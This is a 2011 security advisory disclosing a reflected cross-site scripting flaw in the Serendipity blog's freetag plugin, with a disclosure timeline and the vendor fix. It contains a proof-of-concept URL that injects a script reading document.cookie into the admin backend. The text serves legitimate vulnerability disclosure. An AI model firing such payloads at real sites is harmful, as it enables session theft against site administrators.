SSCHADV2011-016 - Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
Advisory: |
Serendipity freetag plugin ‘serendipity[tagview]’ Cross-Site Scripting vulnerability
|
Advisory ID: | SSCHADV2011-016 |
Author: |
Stefan Schurtz
|
Affected Software: | Successfully tested on Serendipity 1.5.5 |
Vendor URL: | |
Vendor Status: | fixed |
CVE-ID: | - |
======================
Vulnerability Description:
======================
The freetag plugin parameter "serendipity[tagview]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
Vulnerability Description:
======================
The freetag plugin parameter "serendipity[tagview]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script> |
=====
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
23-Sep-2011 – fixed in the latest version
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
23-Sep-2011 – fixed in the latest version
25-Sep-2011 – release date of this security advisory
25-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org
Comments
Display comments as Linear | Threaded